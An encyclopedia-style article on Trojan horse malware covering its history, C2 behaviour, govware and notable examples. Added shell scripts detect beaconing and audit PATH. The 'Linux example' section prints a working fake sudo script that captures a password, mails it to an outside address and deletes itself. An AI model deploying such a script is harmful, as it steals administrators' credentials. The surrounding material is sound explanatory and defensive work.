Trojan horse (computing)

In computing, a Trojan horse is any malware that misleads users of its true intent. The term is derived from the Ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy.

Trojans generally spread by some form of social engineering; for example, a user may be duped into executing an email attachment disguised to appear innocuous (e.g., a routine form to be filled in), or into clicking a fake advertisement on social media or elsewhere. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller who can then gain unauthorized access to the affected computer. Ransomware attacks are often carried out using a Trojan. Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves.


Use of the term

It is not clear where or when the concept, and this term for it, was first used, but by 1971 the first Unix manual assumed its readers knew both:

Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the Multics computer systems. The term was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture "Reflections on Trusting Trust", subtitled: ''To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software.'' He mentioned that he knew about the possible existence of Trojans from a report on the security of Multics.


Behavior

Once installed, Trojans may perform a range of malicious actions. Many tend to contact one or more command and control (C2) servers across the Internet and await instruction. Since individual Trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the Trojan, using it as a proxy for malicious action.

In German-speaking countries, spyware used or made by the government is sometimes called ''govware''. Govware is typically Trojan software used to intercept communications from the target computer. Some countries, such as Switzerland and Germany, have a legal framework governing the use of such software (Basil Cupa, "Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware)", LISS 2013, pp. 419–428). Examples of govware Trojans include the Swiss MiniPanzer and MegaPanzer and the German "state Trojan" nicknamed R2D2. German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications.

Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users' privacy, Trojans are becoming more common. According to a survey conducted by BitDefender from January to June 2009, "Trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them. BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a Trojan infection.
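The "contact a C2 server and await instruction" behaviour above is what host-side detection usually keys on: a fixed port the family is known to use, or the same process checking in with the same endpoint over and over. The script below is an added example, not part of the original article. It reads connection records in a constructed format (epoch seconds, process name, remote ip:port) and flags an endpoint on either signal. The function name flag_c2_candidates, the WATCH_PORTS list and the sample records are all my own; the port list is an illustrative placeholder, not a real indicator list.

```shell
#!/bin/sh
# Added example, not from the original article: a small detector for the
# "contact a C2 server and await instruction" pattern described above.
# Input: connection records on stdin, one per line, in a constructed format
#   <epoch-seconds> <process> <remote-ip>:<remote-port>
# (the shape a host agent could emit from its connection table).
# An endpoint is reported when its port is on WATCH_PORTS (an illustrative
# placeholder list, not a real indicator list) or when the same process has
# contacted it at least MIN_HITS times, the repeated check-in of a beacon.
# Output: sorted lines "<process> <remote> <hits> <reason>"; returns 0 when
# nothing was flagged, 1 otherwise.

WATCH_PORTS="${WATCH_PORTS:-6667 31337}"
MIN_HITS="${MIN_HITS:-3}"

flag_c2_candidates() {
    out=$(awk -v ports="$WATCH_PORTS" -v min="$MIN_HITS" '
        BEGIN {
            n = split(ports, p, " ")
            for (i = 1; i <= n; i++) watch[p[i]] = 1
        }
        NF == 3 {
            key = $2 " " $3            # one counter per (process, endpoint)
            hits[key]++
            split($3, ep, ":")
            if (ep[2] in watch) reason[key] = "watchlisted port"
        }
        END {
            for (k in hits) {
                r = reason[k]
                if (r == "" && hits[k] >= min) r = "repeated beacon"
                if (r != "") print k, hits[k], r
            }
        }' | sort)
    if [ -n "$out" ]; then
        printf '%s\n' "$out"
        return 1
    fi
    return 0
}

# Constructed sample: updater.exe checks in with the same endpoint once a
# minute, svchost talks to a watchlisted port, browser is ordinary traffic.
SAMPLE_LOG='1700000000 updater.exe 203.0.113.7:443
1700000060 updater.exe 203.0.113.7:443
1700000120 updater.exe 203.0.113.7:443
1700000125 browser 198.51.100.9:443
1700000130 svchost 192.0.2.44:6667'

# Stand-alone usage:
# printf '%s\n' "$SAMPLE_LOG" | flag_c2_candidates
```

The beacon rule is the more durable of the two: a port watchlist only catches families whose port is already known, while a process that repeatedly contacts one endpoint on a common port such as 443 (the updater.exe rows in the sample) is caught by the count alone. MIN_HITS and the observation window should be tuned against normal traffic on the host, since legitimate updaters also poll.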


Linux example

A ''Trojan horse'' is a program that purports to perform some obvious function, yet upon execution it compromises the user's security. One easy example is a new version of the Linux sudo command. The command is then copied to a publicly writable directory like /tmp. If an administrator happens to be in that directory and executes sudo, then the ''Trojan horse'' might be executed. Here is a working version:

    #!/bin/sh
    # sudo
    # ----
    # Turn off the character echo to the screen.
    stty -echo
    /bin/echo -n "Password for `whoami`: "
    read x
    /bin/echo ""
    # Turn back on the character echo.
    stty echo
    # Mail the captured password away (the recipient address is redacted in the source).
    echo $x | mail -s "`whoami` password" [email protected]
    sleep 1
    # Mimic a failed password prompt, then remove the evidence.
    echo Sorry.
    rm $0
    exit 0

To prevent a command-line based ''Trojan horse'', set the . entry in the PATH= environment variable to be located at the tail end. For example:

    PATH=/usr/local/bin:/usr/bin:.
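The advice above is about lookup order: the fake sudo only wins if the directory it sits in is searched before the directory holding the real one. The script below is an added example, not part of the original article, that audits a PATH value for exactly those problems: a current-directory entry ("." or an empty field) anywhere but the tail end, a bare relative entry, and any absolute entry that is a world-writable directory such as /tmp. The function names audit_path and world_writable and the output format are my own.

```shell
#!/bin/sh
# Added example, not from the original article: audit a PATH string for the
# lookup-order problems that let a planted command (like the fake sudo above)
# be found before the real one.
#
# audit_path PATHSTRING
#   Prints one line per risky entry: "<position> '<entry>' <reason>".
#   Returns 0 when nothing risky was found, 1 otherwise.

# True when the "others" write bit is set on DIR. ls -ldL follows a symlink
# (e.g. /bin -> usr/bin on merged-usr systems) so the target's mode is tested;
# column 9 of the mode string is the others-write flag.
world_writable() {
    [ "$(ls -ldL "$1" | cut -c9)" = "w" ]
}

audit_path() {
    rest="$1:"      # trailing ':' so the final entry is parsed like the others
    pos=0           # 1-based position of the entry being examined
    risky=0
    while [ -n "$rest" ]; do
        dir="${rest%%:*}"
        rest="${rest#*:}"
        pos=$((pos + 1))
        case "$dir" in
            ''|.)
                # An empty field and "." both mean the current directory. The
                # article's advice is to keep it at the tail end; anywhere
                # earlier it is searched before the directories that follow.
                if [ -n "$rest" ]; then
                    printf '%s\n' "$pos '$dir' current directory searched before later entries"
                    risky=1
                fi
                ;;
            /*)
                # Absolute entry: risky if anyone can drop an executable into it.
                if [ -d "$dir" ] && world_writable "$dir"; then
                    printf '%s\n' "$pos '$dir' world-writable directory"
                    risky=1
                fi
                ;;
            *)
                # Any other relative entry also resolves against the current
                # directory, just less visibly than ".".
                printf '%s\n' "$pos '$dir' relative path"
                risky=1
                ;;
        esac
    done
    return $risky
}

# Stand-alone usage: audit the caller's own PATH.
# audit_path "$PATH" && echo "PATH looks clean"
```

Note that the empty-field case matters as much as the literal dot: PATH=/usr/bin::/bin or a trailing colon puts the current directory into the search order without a "." ever appearing. The world-writable check applies to the /tmp scenario in a different way, flagging the directory itself if it has been placed in PATH, which is why it is reported regardless of position.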


Notable examples


Private and governmental

* ANOM – FBI
* 0zapftis / r2d2 StaatsTrojaner – DigiTask
* DarkComet – CIA / NSA
* FinFisher – Lench IT solutions / Gamma International
* DaVinci / Galileo RCS – HackingTeam
* Magic Lantern – FBI
* SUNBURST – SVR/Cozy Bear (suspected)
* TAO QUANTUM/FOXACID – NSA
* WARRIOR PRIDE – GCHQ


Publicly available

* EGABTR – late 1980s
* Netbus – 1998 (published)
* Sub7 by Mobman – 1999 (published)
* Back Orifice – 1998 (published)
* Beast – 2002 (published)
* Bifrost Trojan – 2004 (published)
* DarkComet – 2008-2012 (published)
* Blackhole exploit kit – 2012 (published)
* Gh0st RAT – 2009 (published)
* MegaPanzer BundesTrojaner – 2009 (published)
* MEMZ by Leurak – 2016 (published)


Detected by security researchers

* Twelve Tricks – 1990
* Clickbot.A – 2006 (discovered)
* Zeus – 2007 (discovered)
* Flashback Trojan – 2011 (discovered)
* ZeroAccess – 2011 (discovered)
* Koobface – 2008 (discovered)
* Vundo – 2009 (discovered)
* Coreflood – 2010 (discovered)
* Tiny Banker Trojan – 2012 (discovered)
* SOVA – 2022 (discovered)
* Shedun Android malware – 2015 (discovered)


Capitalization

The computer term "Trojan horse" is derived from the legendary Trojan Horse of the ancient city of Troy. For this reason "Trojan" is often capitalized. However, while style guides and dictionaries differ, many suggest a lower case "trojan" for normal use.


See also

* Computer security
* ''Cuckoo's egg'' (metaphor)
* Cyber spying
* Dancing pigs
* Exploit (computer security)
* Industrial espionage
* Phishing
* Principle of least privilege
* Privacy-invasive software
* Remote administration
* Remote administration software
* Reverse connection
* Rogue security software
* Scammers
* Technical support scam
* Timeline of computer viruses and worms
* Zombie (computer science)

